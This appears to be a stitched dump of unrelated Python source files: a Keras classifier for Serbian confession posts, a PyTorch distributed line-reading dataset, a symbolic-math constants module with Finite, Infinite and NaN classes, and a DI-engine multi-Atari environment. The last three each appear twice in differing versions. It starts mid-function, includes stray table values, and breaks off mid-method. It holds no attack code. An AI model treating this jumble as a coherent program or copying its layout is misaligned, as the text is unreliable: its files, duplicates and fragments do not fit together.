index = word_dictionary[word]
encoded_story[index] += 1
return encoded_story
def read_stories():
data = []
labels = []
with open('ispovesti.csv', encoding='utf-8') as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
for row in csv_reader:
data.append(row[0])
likes = float(row[1])
dislikes = float(row[2])
if likes > dislikes:
labels.append(1)
else:
labels.append(0)
return data, labels
word_dictionary = read_dictionary(5000)
data, labels = read_stories()
encoded_data = np.array([one_hot(x, word_dictionary) for x in data])
labels = np.array(labels)
split = int(encoded_data.shape[0] * 0.85)
train_data = encoded_data[0:split, :]
train_labels = labels[0:split]
test_data = encoded_data[split:, :]
test_labels = labels[split:]
input_size = len(word_dictionary)
model = keras.Sequential()
model.add(keras.layers.InputLayer(input_shape=(input_size,)))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(64, activation='relu'))
model.add(keras.layers.Dense(1, activation='sigmoid'))
model.compile(optimizer="adam", loss="binary_crossentropy", metrics=['accuracy'])
model.summary()
history = model.fit(train_data, train_labels, validation_split=0.1, batch_size=128, epochs=6)
score = model.evaluate(test_data, test_labels)
#print("Test accuracy:", score)
#print(history.history.keys())
komentari = [
"Imam najljepsu mater na svetu.",
"Prevario sam ženu.",
"Prevarila sam dečka.",
"Joj kako ne mogu kada mi u kafanu dođe dijaspora pa se nešta pravi kao da je neko i nešta."
]
test = np.array([one_hot(x, word_dictionary) for x in komentari])
predictions = model.predict(test)
print(predictions)
for prediction in predictions:
if prediction[0]>= 0.5:
print("Ispovijest ima pozitivan sadrzaj")
else:
print("Ispovijest ima negativan sadrzaj") | 0.27338 | 0.323727 |
import sys
from typing import List, Any
import warnings
import random
from itertools import cycle
import torch
from torch.utils.data import IterableDataset
from utils.hdfs_io import hopen, hlist_files
class DistLineReadingDataset(IterableDataset): # pylint: disable=W0223
    """
    Iterable dataset that streams raw text lines from a set of files/folders,
    sharding the file list first across distributed ranks and then across
    dataloader workers.
    """
    def __init__(self,
                 data_path: str,
                 rank: int = 0,
                 world_size: int = 1,
                 shuffle: bool = False,
                 repeat: bool = False):
        # data_path: comma-separated list of paths expanded via hlist_files.
        # rank / world_size: distributed identity used for file-level sharding.
        # shuffle: shuffle file order (per epoch, and again after the worker split).
        # repeat: iterate the file list forever instead of a single pass.
        super().__init__()
        self.shuffle = shuffle
        self.rank = rank
        self.world_size = world_size
        self.files = hlist_files(data_path.split(','))
        # Drop marker files such as Hadoop's `_SUCCESS`.
        self.files = [f for f in self.files if f.find('_SUCCESS') < 0]
        self.is_hdfs = data_path.startswith('hdfs')
        self.repeat = repeat
        print('[DATA]--all dataset containing {} files.'.format(len(self.files)))
        if len(self.files) % self.world_size != 0:
            # Uneven split: some ranks will see one file more than others.
            print('[DATA]--Whole dataset file num %s cannot split to worldsize %s ' %
                  (len(self.files), self.world_size))
        sys.stdout.flush()
    def generate(self):
        # Rank-level shard: each distributed rank owns a contiguous slice of files.
        if self.world_size == 1 or len(self.files) == 1:
            cur_dataloader_files = self.files
        else:
            cur_dataloader_files = split_shard(
                self.files, self.rank, self.world_size)
        while True:
            if self.shuffle:
                # NOTE(review): inside dataloader workers this shuffle runs with each
                # worker's own unseeded RNG *before* the per-worker split below, so
                # workers may end up with overlapping/missing files -- confirm intended.
                random.shuffle(cur_dataloader_files)
            worker_info = torch.utils.data.get_worker_info()
            if worker_info is not None:
                # Worker-level shard: split this rank's files across dataloader workers.
                if len(cur_dataloader_files) % worker_info.num_workers != 0:
                    print('[DATA]--current dataloader %s file num %s cannot split to worker_num %s ' %
                          (self.rank, len(cur_dataloader_files), worker_info.num_workers))
                cur_worker_files = split_shard(
                    cur_dataloader_files, worker_info.id, worker_info.num_workers)
                if worker_info.id == 0:
                    print("[DataLoader] --> Rank:{} Workers:[{} ~ {}][{}] Size of process file:{} ...".format(
                        self.rank, 0, worker_info.num_workers - 1, worker_info.id, len(cur_dataloader_files)))
            else:
                cur_worker_files = cur_dataloader_files
            if self.shuffle:
                random.shuffle(cur_worker_files)
            for filepath in cur_worker_files:
                if self.is_hdfs:
                    # HDFS readers yield bytes; decode to str before yielding.
                    with hopen(filepath, 'r') as reader:
                        for line in reader:
                            yield line.decode()
                    continue
                # Local files are opened in text mode and yielded as-is.
                with open(filepath, 'r') as reader:
                    for line in reader:
                        yield line
            if not self.repeat:
                break
    def __iter__(self):
        return self.generate()
def split_shard(data: List[Any], shard_idx: int, shard_size: int):
    """Return the contiguous slice of *data* owned by shard ``shard_idx`` of ``shard_size``."""
    total = len(data)
    if total < shard_size:
        # Cannot give every shard at least one element.
        raise RuntimeError("num:{} < shard size:{}".format(total, shard_size))
    lo = (total * shard_idx) // shard_size
    hi = (total * (shard_idx + 1)) // shard_size
    return data[lo:hi]
import sys
from typing import List, Any
import warnings
import random
from itertools import cycle
import torch
from torch.utils.data import IterableDataset
from utils.hdfs_io import hopen, hlist_files
class DistLineReadingDataset(IterableDataset): # pylint: disable=W0223
    """
    Iterable dataset that streams raw text lines from a set of files/folders,
    sharding the file list first across distributed ranks and then across
    dataloader workers.
    """
    def __init__(self,
                 data_path: str,
                 rank: int = 0,
                 world_size: int = 1,
                 shuffle: bool = False,
                 repeat: bool = False):
        # data_path: comma-separated list of paths expanded via hlist_files.
        # rank / world_size: distributed identity used for file-level sharding.
        # shuffle: shuffle file order (per epoch, and again after the worker split).
        # repeat: iterate the file list forever instead of a single pass.
        super().__init__()
        self.shuffle = shuffle
        self.rank = rank
        self.world_size = world_size
        self.files = hlist_files(data_path.split(','))
        # Drop marker files such as Hadoop's `_SUCCESS`.
        self.files = [f for f in self.files if f.find('_SUCCESS') < 0]
        self.is_hdfs = data_path.startswith('hdfs')
        self.repeat = repeat
        print('[DATA]--all dataset containing {} files.'.format(len(self.files)))
        if len(self.files) % self.world_size != 0:
            # Uneven split: some ranks will see one file more than others.
            print('[DATA]--Whole dataset file num %s cannot split to worldsize %s ' %
                  (len(self.files), self.world_size))
        sys.stdout.flush()
    def generate(self):
        # Rank-level shard: each distributed rank owns a contiguous slice of files.
        if self.world_size == 1 or len(self.files) == 1:
            cur_dataloader_files = self.files
        else:
            cur_dataloader_files = split_shard(
                self.files, self.rank, self.world_size)
        while True:
            if self.shuffle:
                # NOTE(review): inside dataloader workers this shuffle runs with each
                # worker's own unseeded RNG *before* the per-worker split below, so
                # workers may end up with overlapping/missing files -- confirm intended.
                random.shuffle(cur_dataloader_files)
            worker_info = torch.utils.data.get_worker_info()
            if worker_info is not None:
                # Worker-level shard: split this rank's files across dataloader workers.
                if len(cur_dataloader_files) % worker_info.num_workers != 0:
                    print('[DATA]--current dataloader %s file num %s cannot split to worker_num %s ' %
                          (self.rank, len(cur_dataloader_files), worker_info.num_workers))
                cur_worker_files = split_shard(
                    cur_dataloader_files, worker_info.id, worker_info.num_workers)
                if worker_info.id == 0:
                    print("[DataLoader] --> Rank:{} Workers:[{} ~ {}][{}] Size of process file:{} ...".format(
                        self.rank, 0, worker_info.num_workers - 1, worker_info.id, len(cur_dataloader_files)))
            else:
                cur_worker_files = cur_dataloader_files
            if self.shuffle:
                random.shuffle(cur_worker_files)
            for filepath in cur_worker_files:
                if self.is_hdfs:
                    # HDFS readers yield bytes; decode to str before yielding.
                    with hopen(filepath, 'r') as reader:
                        for line in reader:
                            yield line.decode()
                    continue
                # Local files are opened in text mode and yielded as-is.
                with open(filepath, 'r') as reader:
                    for line in reader:
                        yield line
            if not self.repeat:
                break
    def __iter__(self):
        return self.generate()
def split_shard(data: List[Any], shard_idx: int, shard_size: int):
    """Slice out shard ``shard_idx`` (0-based) of ``shard_size`` near-equal contiguous shards."""
    n = len(data)
    if n < shard_size:
        # Fewer items than shards: at least one shard would be empty.
        raise RuntimeError("num:{} < shard size:{}".format(n, shard_size))
    start, stop = (n * shard_idx) // shard_size, (n * (shard_idx + 1)) // shard_size
    return data[start:stop]
import math
from abc import abstractmethod
from numbers import (Rational,
Real)
from typing import (Any,
Optional,
Tuple,
Union)
from cfractions import Fraction
from reprit.base import generate_repr
from .expression import Expression
from .hints import SqrtEvaluator
from .utils import (digits_count,
identity,
perfect_sqrt,
positiveness_to_sign,
square)
class Constant(Expression):
    """Base class for constant (variable-free) expressions."""
    @property
    def degree(self) -> int:
        # Constants are degree-0 expressions.
        return 0
    @property
    @abstractmethod
    def value(self) -> Real:
        """Returns value of the constant."""
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        # No square roots to resolve: a constant evaluates to its stored value.
        return self.value
    def is_positive(self) -> bool:
        return self.value > 0
    def lower_bound(self) -> Real:
        # A constant is its own tightest lower (and upper) bound.
        return self.value
    upper_bound = lower_bound
    def __eq__(self, other: Any) -> Any:
        # Compare by value to plain reals and to other constants;
        # defer to the other operand for anything else.
        if isinstance(other, Real):
            return self.value == other
        if isinstance(other, Expression):
            return isinstance(other, Constant) and self.value == other.value
        return NotImplemented
    def __hash__(self) -> int:
        return hash(self.value)
    def __str__(self) -> str:
        return str(self.value)
class Finite(Constant):
    """Represents rational number."""
    is_finite = True
    __slots__ = '_value',
    def __init__(self, value: Real = 0) -> None:
        # Normalize any supported real input to an exact fraction.
        self._value = Fraction(value)
    @property
    def value(self) -> Rational:
        return self._value
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        # Exact value; no square-root evaluation needed for a rational constant.
        return self.value
    def extract_common_denominator(self) -> Tuple[int, 'Finite']:
        # value == Finite(numerator) / denominator.
        return self.value.denominator, Finite(self.value.numerator)
    def extract_common_numerator(self) -> Tuple[int, 'Finite']:
        # value == numerator * (One / denominator); `One` is defined after this
        # class at module level and is resolved at call time.
        return self.value.numerator, One / self.value.denominator
    def inverse(self) -> 'Finite':
        # Multiplicative inverse (undefined for zero: division by zero).
        return Finite(Fraction(self.value.denominator, self.value.numerator))
    def is_positive(self) -> bool:
        return self.value > 0
    def perfect_sqrt(self) -> Expression:
        # Square root of the perfect-square part, taken on numerator and
        # denominator separately.
        return Finite(Fraction(perfect_sqrt(self.value.numerator),
                               perfect_sqrt(self.value.denominator)))
    def significant_digits_count(self) -> int:
        # Digit count of the nearest-integer approximation of the value.
        return digits_count(self._value.limit_denominator(1).numerator)
    def square(self) -> 'Finite':
        return Finite(square(self.value))
    def __add__(self, other: Union[Real, 'Finite']) -> 'Finite':
        other = to_expression(other)
        # Delegate to the other operand when it is a non-Finite expression.
        return ((Finite(self.value + other.value)
                 if isinstance(other, Finite)
                 else other.__radd__(self))
                if isinstance(other, Expression)
                else NotImplemented)
    def __bool__(self) -> bool:
        return bool(self.value)
    def __mul__(self, other: Union[Real, 'Finite']) -> 'Finite':
        other = to_expression(other)
        return ((Finite(self.value * other.value)
                 if isinstance(other, Finite)
                 else other.__rmul__(self))
                if isinstance(other, Expression)
                else NotImplemented)
    def __neg__(self) -> 'Finite':
        return Finite(-self.value)
    def __radd__(self, other: Union[Real, 'Finite']) -> 'Finite':
        return (to_expression(other) + self
                if isinstance(other, Real)
                else NotImplemented)
    __repr__ = generate_repr(__init__)
    def __rmul__(self, other: Union[Real, 'Finite']) -> 'Finite':
        return (to_expression(other) * self
                if isinstance(other, Real)
                else NotImplemented)
Zero, One = Finite(0), Finite(1)  # shared rational constants used throughout the module
class Infinite(Constant):
    # Signed infinity; the sign lives in `_is_positive`, the float value is derived.
    is_finite = False
    @property
    def degree(self) -> int:
        return 0
    @property
    def value(self) -> Real:
        # +math.inf or -math.inf depending on the stored sign.
        return positiveness_to_sign(self.is_positive()) * math.inf
    __slots__ = '_is_positive',
    def __init__(self, is_positive: bool) -> None:
        self._is_positive = is_positive
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        return self.value
    def extract_common_denominator(self) -> Tuple[int, 'Expression']:
        # Nothing finite to factor out of an infinity.
        return 1, self
    def extract_common_numerator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def inverse(self) -> 'Expression':
        # 1 / (+/-inf) == 0.
        return Zero
    def is_positive(self) -> bool:
        return self._is_positive
    perfect_sqrt = identity
    def significant_digits_count(self) -> int:
        return 0
    def square(self) -> 'Expression':
        # Squaring either infinity yields positive infinity.
        return Infinity
    def __add__(self, other: Union[Real, 'Expression']) -> Constant:
        other = to_expression(other)
        # inf + finite and inf + same-signed inf stay inf;
        # inf + opposite inf and inf + NaN give NaN.
        return ((self
                 if (other.is_finite
                     or (other is not NaN
                         and self.is_positive() is other.is_positive()))
                 else NaN)
                if isinstance(other, Expression)
                else NotImplemented)
    def __ge__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        # Comparisons with NaN are always False.
        # NOTE(review): the isinstance check here accepts (Real, Expression) while
        # __gt__/__le__/__lt__ accept Expression only; after to_expression the Real
        # branch is redundant -- confirm which form is intended.
        return (other is not NaN and (self.is_positive() or self == other)
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __gt__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and self.is_positive() and self != other
                if isinstance(other, Expression)
                else NotImplemented)
    def __le__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and (not self.is_positive() or self == other)
                if isinstance(other, Expression)
                else NotImplemented)
    def __lt__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and not self.is_positive() and self != other
                if isinstance(other, Expression)
                else NotImplemented)
    def __mul__(self, other: Union[Real, 'Expression']) -> Constant:
        other = to_expression(other)
        # Sign rule for inf * x; inf * 0 (falsy `other`) and inf * NaN give NaN.
        return (((Infinity
                  if self.is_positive() is other.is_positive()
                  else -Infinity)
                 if other and other is not NaN
                 else NaN)
                if isinstance(other, Expression)
                else NotImplemented)
    def __neg__(self) -> 'Expression':
        return Infinite(not self.is_positive())
    __radd__ = __add__
    __repr__ = generate_repr(__init__)
    __rmul__ = __mul__
Infinity = Infinite(True)  # canonical positive-infinity constant
class _NaN(Constant):
    """Not-a-number singleton: absorbs arithmetic and is unordered with everything."""
    is_finite = False
    value = math.nan
    _instance = None
    def __new__(cls) -> '_NaN':
        # Enforce a single shared instance so `is NaN` identity checks are reliable.
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance
    __slots__ = ()
    def extract_common_denominator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def extract_common_numerator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def inverse(self) -> 'Expression':
        return self
    def is_positive(self) -> bool:
        return False
    perfect_sqrt = identity
    def significant_digits_count(self) -> int:
        return 0
    square = identity
    def __add__(self, other: Union[Real, 'Expression']) -> 'Expression':
        # NaN propagates through arithmetic regardless of the operand.
        return self
    def __ge__(self, other: Union[Real, 'Expression']) -> bool:
        # NaN is unordered: every comparison with a supported type is False.
        if isinstance(other, (Real, Expression)):
            return False
        return NotImplemented
    # All four comparisons share the same "always False" semantics.
    __gt__ = __ge__
    __le__ = __ge__
    __lt__ = __ge__
    def __mul__(self, other: Union[Real, 'Expression']) -> 'Expression':
        return self
    __neg__ = identity
    __radd__ = __add__
    def __repr__(self) -> str:
        return 'NaN'
    __rmul__ = __mul__
NaN = _NaN()  # the unique not-a-number instance (_NaN is a singleton)
def to_expression(other: Union[Real, Expression]) -> Expression:
    """Coerce a plain real number into the matching constant Expression;
    pass Expression instances (and unsupported types) through unchanged."""
    if not isinstance(other, Real):
        return other
    if isinstance(other, Rational):
        # Exact rationals keep their exactness.
        return Finite(other)
    if math.isfinite(other):
        return Finite(float(other))
    if math.isinf(other):
        return Infinite(other > 0)
    return NaN
from abc import abstractmethod
from numbers import (Rational,
Real)
from typing import (Any,
Optional,
Tuple,
Union)
from cfractions import Fraction
from reprit.base import generate_repr
from .expression import Expression
from .hints import SqrtEvaluator
from .utils import (digits_count,
identity,
perfect_sqrt,
positiveness_to_sign,
square)
class Constant(Expression):
    """Base class for constant (variable-free) expressions."""
    @property
    def degree(self) -> int:
        # Constants are degree-0 expressions.
        return 0
    @property
    @abstractmethod
    def value(self) -> Real:
        """Returns value of the constant."""
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        # No square roots to resolve: a constant evaluates to its stored value.
        return self.value
    def is_positive(self) -> bool:
        return self.value > 0
    def lower_bound(self) -> Real:
        # A constant is its own tightest lower (and upper) bound.
        return self.value
    upper_bound = lower_bound
    def __eq__(self, other: Any) -> Any:
        # Compare by value to plain reals and to other constants;
        # defer (NotImplemented) for anything else.
        return (self.value == other
                if isinstance(other, Real)
                else (isinstance(other, Constant)
                      and self.value == other.value
                      if isinstance(other, Expression)
                      else NotImplemented))
    def __hash__(self) -> int:
        return hash(self.value)
    def __str__(self) -> str:
        return str(self.value)
class Finite(Constant):
    """Represents rational number."""
    is_finite = True
    __slots__ = '_value',
    def __init__(self, value: Real = 0) -> None:
        # Normalize any supported real input to an exact fraction.
        self._value = Fraction(value)
    @property
    def value(self) -> Rational:
        return self._value
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        # Exact value; no square-root evaluation needed for a rational constant.
        return self.value
    def extract_common_denominator(self) -> Tuple[int, 'Finite']:
        # value == Finite(numerator) / denominator.
        return self.value.denominator, Finite(self.value.numerator)
    def extract_common_numerator(self) -> Tuple[int, 'Finite']:
        # value == numerator * (One / denominator); `One` is defined after this
        # class at module level and is resolved at call time.
        return self.value.numerator, One / self.value.denominator
    def inverse(self) -> 'Finite':
        # Multiplicative inverse (undefined for zero: division by zero).
        return Finite(Fraction(self.value.denominator, self.value.numerator))
    def is_positive(self) -> bool:
        return self.value > 0
    def perfect_sqrt(self) -> Expression:
        # Square root of the perfect-square part, taken on numerator and
        # denominator separately.
        return Finite(Fraction(perfect_sqrt(self.value.numerator),
                               perfect_sqrt(self.value.denominator)))
    def significant_digits_count(self) -> int:
        # Digit count of the nearest-integer approximation of the value.
        return digits_count(self._value.limit_denominator(1).numerator)
    def square(self) -> 'Finite':
        return Finite(square(self.value))
    def __add__(self, other: Union[Real, 'Finite']) -> 'Finite':
        other = to_expression(other)
        # Delegate to the other operand when it is a non-Finite expression.
        return ((Finite(self.value + other.value)
                 if isinstance(other, Finite)
                 else other.__radd__(self))
                if isinstance(other, Expression)
                else NotImplemented)
    def __bool__(self) -> bool:
        return bool(self.value)
    def __mul__(self, other: Union[Real, 'Finite']) -> 'Finite':
        other = to_expression(other)
        return ((Finite(self.value * other.value)
                 if isinstance(other, Finite)
                 else other.__rmul__(self))
                if isinstance(other, Expression)
                else NotImplemented)
    def __neg__(self) -> 'Finite':
        return Finite(-self.value)
    def __radd__(self, other: Union[Real, 'Finite']) -> 'Finite':
        return (to_expression(other) + self
                if isinstance(other, Real)
                else NotImplemented)
    __repr__ = generate_repr(__init__)
    def __rmul__(self, other: Union[Real, 'Finite']) -> 'Finite':
        return (to_expression(other) * self
                if isinstance(other, Real)
                else NotImplemented)
Zero, One = Finite(0), Finite(1)  # shared rational constants used throughout the module
class Infinite(Constant):
    # Signed infinity; the sign lives in `_is_positive`, the float value is derived.
    is_finite = False
    @property
    def degree(self) -> int:
        return 0
    @property
    def value(self) -> Real:
        # +math.inf or -math.inf depending on the stored sign.
        return positiveness_to_sign(self.is_positive()) * math.inf
    __slots__ = '_is_positive',
    def __init__(self, is_positive: bool) -> None:
        self._is_positive = is_positive
    def evaluate(self, sqrt_evaluator: Optional[SqrtEvaluator] = None) -> Real:
        return self.value
    def extract_common_denominator(self) -> Tuple[int, 'Expression']:
        # Nothing finite to factor out of an infinity.
        return 1, self
    def extract_common_numerator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def inverse(self) -> 'Expression':
        # 1 / (+/-inf) == 0.
        return Zero
    def is_positive(self) -> bool:
        return self._is_positive
    perfect_sqrt = identity
    def significant_digits_count(self) -> int:
        return 0
    def square(self) -> 'Expression':
        # Squaring either infinity yields positive infinity.
        return Infinity
    def __add__(self, other: Union[Real, 'Expression']) -> Constant:
        other = to_expression(other)
        # inf + finite and inf + same-signed inf stay inf;
        # inf + opposite inf and inf + NaN give NaN.
        return ((self
                 if (other.is_finite
                     or (other is not NaN
                         and self.is_positive() is other.is_positive()))
                 else NaN)
                if isinstance(other, Expression)
                else NotImplemented)
    def __ge__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        # Comparisons with NaN are always False.
        # NOTE(review): the isinstance check here accepts (Real, Expression) while
        # __gt__/__le__/__lt__ accept Expression only; after to_expression the Real
        # branch is redundant -- confirm which form is intended.
        return (other is not NaN and (self.is_positive() or self == other)
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __gt__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and self.is_positive() and self != other
                if isinstance(other, Expression)
                else NotImplemented)
    def __le__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and (not self.is_positive() or self == other)
                if isinstance(other, Expression)
                else NotImplemented)
    def __lt__(self, other: Union[Real, 'Expression']) -> bool:
        other = to_expression(other)
        return (other is not NaN and not self.is_positive() and self != other
                if isinstance(other, Expression)
                else NotImplemented)
    def __mul__(self, other: Union[Real, 'Expression']) -> Constant:
        other = to_expression(other)
        # Sign rule for inf * x; inf * 0 (falsy `other`) and inf * NaN give NaN.
        return (((Infinity
                  if self.is_positive() is other.is_positive()
                  else -Infinity)
                 if other and other is not NaN
                 else NaN)
                if isinstance(other, Expression)
                else NotImplemented)
    def __neg__(self) -> 'Expression':
        return Infinite(not self.is_positive())
    __radd__ = __add__
    __repr__ = generate_repr(__init__)
    __rmul__ = __mul__
Infinity = Infinite(True)  # canonical positive-infinity constant
class _NaN(Constant):
    # Not-a-number: absorbs arithmetic and compares False with everything.
    is_finite = False
    value = math.nan
    _instance = None
    def __new__(cls) -> '_NaN':
        # Singleton so identity checks (`is NaN`) are reliable module-wide.
        if cls._instance is None:
            cls._instance = super().__new__(cls)
        return cls._instance
    __slots__ = ()
    def extract_common_denominator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def extract_common_numerator(self) -> Tuple[int, 'Expression']:
        return 1, self
    def inverse(self) -> 'Expression':
        return self
    def is_positive(self) -> bool:
        return False
    perfect_sqrt = identity
    def significant_digits_count(self) -> int:
        return 0
    square = identity
    def __add__(self, other: Union[Real, 'Expression']) -> 'Expression':
        # NaN propagates through addition regardless of the operand.
        return self
    def __ge__(self, other: Union[Real, 'Expression']) -> bool:
        # NaN is unordered: all comparisons with supported types are False.
        return (False
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __gt__(self, other: Union[Real, 'Expression']) -> bool:
        return (False
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __le__(self, other: Union[Real, 'Expression']) -> bool:
        return (False
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __lt__(self, other: Union[Real, 'Expression']) -> bool:
        return (False
                if isinstance(other, (Real, Expression))
                else NotImplemented)
    def __mul__(self, other: Union[Real, 'Expression']) -> 'Expression':
        # NaN propagates through multiplication as well.
        return self
    __neg__ = identity
    def __radd__(self, other: Union[Real, 'Expression']) -> 'Expression':
        return self
    def __repr__(self) -> str:
        return 'NaN'
    def __rmul__(self, other: Union[Real, 'Expression']) -> 'Expression':
        return self
NaN = _NaN()  # the unique not-a-number instance (_NaN is a singleton)
def to_expression(other: Union[Real, Expression]) -> Expression:
    """Wrap a plain real number as the matching constant Expression
    (identity for Expression instances and unsupported types)."""
    if isinstance(other, Real):
        if isinstance(other, Rational):
            # Exact rationals keep their exactness.
            return Finite(other)
        elif math.isfinite(other):
            return Finite(float(other))
        elif math.isinf(other):
            return Infinite(other > 0)
        else:
            return NaN
    return other
from typing import List
import copy
import numpy as np
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common.env_element import EnvElement, EnvElementInfo
from ding.utils import ENV_REGISTRY
from .atari_env import AtariEnv, ATARIENV_INFO_DICT
@ENV_REGISTRY.register('atari_multi_discrete')
class AtariMultiDiscreteEnv(BaseEnv):
    """Bundle of independent Atari sub-environments exposed as one environment.

    Observations of all sub-envs are concatenated along the first axis and the
    action is a multi-discrete vector with one discrete action per sub-env.
    The combined episode ends when every sub-env is done; a finished sub-env's
    observation is frozen at its final frame until then.
    """

    def __init__(self, cfg: dict) -> None:
        self._multi_env_num = cfg['multi_env_num']
        self._env = [AtariEnv(cfg) for _ in range(self._multi_env_num)]
        # Per-sub-env done flags and the observation each sub-env finished on.
        self._env_done = {i: False for i in range(self._multi_env_num)}
        self._done_obs = {i: None for i in range(self._multi_env_num)}
        self._final_eval_reward = 0.
        self._cfg = cfg

    def reset(self) -> np.ndarray:
        """Reset every sub-environment and return the concatenated observation."""
        obs = []
        for e in self._env:
            obs.append(e.reset())
        self._env_done = {i: False for i in range(self._multi_env_num)}
        self._done_obs = {i: None for i in range(self._multi_env_num)}
        self._final_eval_reward = 0.
        return np.concatenate(obs, axis=0)

    def close(self) -> None:
        for e in self._env:
            e.close()

    def seed(self, seed: int) -> None:
        # Offset the seed per sub-environment so they do not run in lockstep.
        for i, e in enumerate(self._env):
            e.seed(seed + i)

    def step(self, action: list) -> BaseEnvTimestep:
        """Step every still-running sub-environment with its slice of `action`."""
        timestep = []
        for i, (a, e) in enumerate(zip(action, self._env)):
            if not self._env_done[i]:
                timestep.append(e.step(a))
        reward = sum([t.reward for t in timestep])
        done = all([t.done for t in timestep])
        obs = []
        j = 0  # index into `timestep`, which only covers the non-done sub-envs
        for i in range(self._multi_env_num):
            if self._env_done[i]:
                # Sub-env finished earlier: repeat its frozen final observation.
                obs.append(self._done_obs[i])
            else:
                if timestep[j].done:
                    # Accumulate the per-sub-env episode return once, on its last step.
                    self._final_eval_reward += timestep[j].info['final_eval_reward']
                    self._env_done[i] = True
                    self._done_obs[i] = copy.deepcopy(timestep[j].obs)
                obs.append(timestep[j].obs)
                j += 1
        obs = np.concatenate(obs, axis=0)
        info = {}
        if done:
            info['final_eval_reward'] = self._final_eval_reward
        return BaseEnvTimestep(obs, reward, done, info)

    def info(self) -> BaseEnvInfo:
        """Build the combined env spec from the per-env Atari spec table.

        Fix: the previous version called ``self._env[0].info()`` and discarded
        the result (unused local); the dead call has been removed.
        """
        T = EnvElementInfo
        if self._cfg.env_id in ATARIENV_INFO_DICT:
            obs_shape = list(ATARIENV_INFO_DICT[self._cfg.env_id].obs_space.shape)
            n = ATARIENV_INFO_DICT[self._cfg.env_id].act_space.shape[0]
        else:
            raise NotImplementedError('{} not found in ATARIENV_INFO_DICT [{}]'\
                .format(self._cfg.env_id, ATARIENV_INFO_DICT.keys()))
        # Observations are stacked along the first axis, one slice per sub-env.
        obs_shape[0] = obs_shape[0] * self._multi_env_num
        obs_space = T(obs_shape, {'dtype': np.float32}, None, None)
        act_shape = tuple([n for _ in range(self._multi_env_num)])
        act_space = T(act_shape, {'dtype': np.float32}, None, None)
        rew_space = T(1, {'min': -self._multi_env_num, 'max': self._multi_env_num, 'dtype': np.float32}, None, None)
        return BaseEnvInfo(
            agent_num=self._multi_env_num,
            obs_space=obs_space,
            act_space=act_space,
            rew_space=rew_space,
        )

    def __repr__(self) -> str:
        return "DI-engine Atari Multi Discrete Env({})".format(self._cfg.env_id)

    @staticmethod
    def create_collector_env_cfg(cfg: dict) -> List[dict]:
        """Replicate the config once per collector env, with ``is_train=True``."""
        collector_env_num = cfg.pop('collector_env_num', 1)
        cfg = copy.deepcopy(cfg)
        cfg.is_train = True
        return [cfg for _ in range(collector_env_num)]

    @staticmethod
    def create_evaluator_env_cfg(cfg: dict) -> List[dict]:
        """Replicate the config once per evaluator env, with ``is_train=False``."""
        evaluator_env_num = cfg.pop('evaluator_env_num', 1)
        cfg = copy.deepcopy(cfg)
        cfg.is_train = False
        return [cfg for _ in range(evaluator_env_num)]
import copy
import numpy as np
from ding.envs import BaseEnv, BaseEnvTimestep, BaseEnvInfo
from ding.envs.common.env_element import EnvElement, EnvElementInfo
from ding.utils import ENV_REGISTRY
from .atari_env import AtariEnv, ATARIENV_INFO_DICT
@ENV_REGISTRY.register('atari_multi_discrete')
class AtariMultiDiscreteEnv(BaseEnv):
    """Bundle of independent Atari sub-environments exposed as one environment:
    observations are concatenated along the first axis and the action is a
    multi-discrete vector with one discrete action per sub-env."""
    def __init__(self, cfg: dict) -> None:
        self._multi_env_num = cfg['multi_env_num']
        self._env = [AtariEnv(cfg) for _ in range(self._multi_env_num)]
        # Per-sub-env done flags and the observation each sub-env finished on.
        self._env_done = {i: False for i in range(self._multi_env_num)}
        self._done_obs = {i: None for i in range(self._multi_env_num)}
        self._final_eval_reward = 0.
        self._cfg = cfg
    def reset(self) -> np.ndarray:
        # Reset every sub-env and clear the done/frozen-observation bookkeeping.
        obs = []
        for e in self._env:
            obs.append(e.reset())
        self._env_done = {i: False for i in range(self._multi_env_num)}
        self._done_obs = {i: None for i in range(self._multi_env_num)}
        self._final_eval_reward = 0.
        return np.concatenate(obs, axis=0)
    def close(self) -> None:
        for e in self._env:
            e.close()
    def seed(self, seed: int) -> None:
        # Offset the seed per sub-env so they do not run in lockstep.
        for i, e in enumerate(self._env):
            e.seed(seed + i)
    def step(self, action: list) -> BaseEnvTimestep:
        # Step only sub-envs that are still running.
        timestep = []
        for i, (a, e) in enumerate(zip(action, self._env)):
            if not self._env_done[i]:
                timestep.append(e.step(a))
        reward = sum([t.reward for t in timestep])
        done = all([t.done for t in timestep])
        obs = []
        j = 0  # index into `timestep`, which only covers the non-done sub-envs
        for i in range(self._multi_env_num):
            if self._env_done[i]:
                # Sub-env finished earlier: repeat its frozen final observation.
                obs.append(self._done_obs[i])
            else:
                if timestep[j].done:
                    # print('done', i, timestep[j].info['final_eval_reward'])
                    self._final_eval_reward += timestep[j].info['final_eval_reward']
